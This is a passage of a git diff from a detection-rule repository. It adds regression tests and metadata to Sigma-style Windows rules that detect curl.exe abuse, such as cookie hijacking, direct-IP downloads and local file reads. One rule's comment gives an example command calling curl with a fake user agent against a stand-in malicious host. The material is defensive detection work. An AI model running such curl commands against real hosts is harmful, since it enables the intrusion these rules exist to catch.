"MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681", + "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800", + "ParentProcessId": 14736, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", + "ParentUser": "swachchhanda\\xodih" + } + } +} diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml new file mode 100644 index 000000000..a68d78d05 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml @@ -0,0 +1,13 @@ +id: 4dfcc9a3-f555-4692-aa17-bca049de2f61 +description: N/A +date: 2025-12-11 +author: Swachchhanda Shrawan Poudel (Nextron Systems) +rule_metadata: + - id: aa6f6ea6-0676-40dd-b510-6e46f02d8867 + title: Local File Read Using Curl.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx diff --git a/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml b/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml index 796cb8382..9278e854e 100644 --- a/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml +++ b/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml @@ -22,3 +22,4 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml b/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml index c47022bc2..b48dbea1b 100644 --- a/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml +++ b/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml @@ -7,19 +7,26 @@ references: - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv author: Nasreddine Bencherchali (Nextron Systems) date: 2023-07-27 +modified: 2025-12-11 tags: - attack.execution logsource: category: process_creation product: windows detection: + # Example: This command line would trigger the rule + # curl.exe -H "User-Agent: EvilAgent" http://malicious.example.com selection_img: - Image|endswith: '\curl.exe' - OriginalFileName: 'curl.exe' - selection_header: + selection_header_flag_1: CommandLine|re: '\s-H\s' # Must be Regex as the flag needs to be case sensitive + selection_header_flag_2: + CommandLine|contains: '--header' + selection_user_agent: CommandLine|contains: 'User-Agent:' - condition: all of selection_* + condition: selection_img and 1 of selection_header_* and selection_user_agent falsepositives: - Unknown level: medium +regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml b/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml index d4174b490..00d4e7de0 100644 --- a/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml +++ b/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml @@ -78,3 +78,4 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml b/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml index 7a9688040..0df03ff35 100644 --- a/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml +++ b/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml @@ -75,3 +75,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml b/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml index a404e39aa..261dbcad7 100644 --- a/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml +++ b/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml @@ -94,3 +94,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml b/rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml index 8c3360a74..18e416a32 100644 --- a/rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml +++ b/rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml @@ -22,3 +22,4 @@ detection: falsepositives: - Access to badly maintained internal or development systems level: medium +regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml b/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh.yml similarity index 85% rename from rules/windows/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml rename to rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh.yml index eac8b3bf2..d6e5bfa58 100644 --- a/rules/windows/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml +++ b/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh.yml @@ -23,3 +23,4 @@ detection: falsepositives: - Access to badly maintained internal or development systems level: medium +regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml b/rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml index 257c0f0f7..1e6a27821 100644 --- a/rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml +++ b/rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml @@ -21,3 +21,4 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml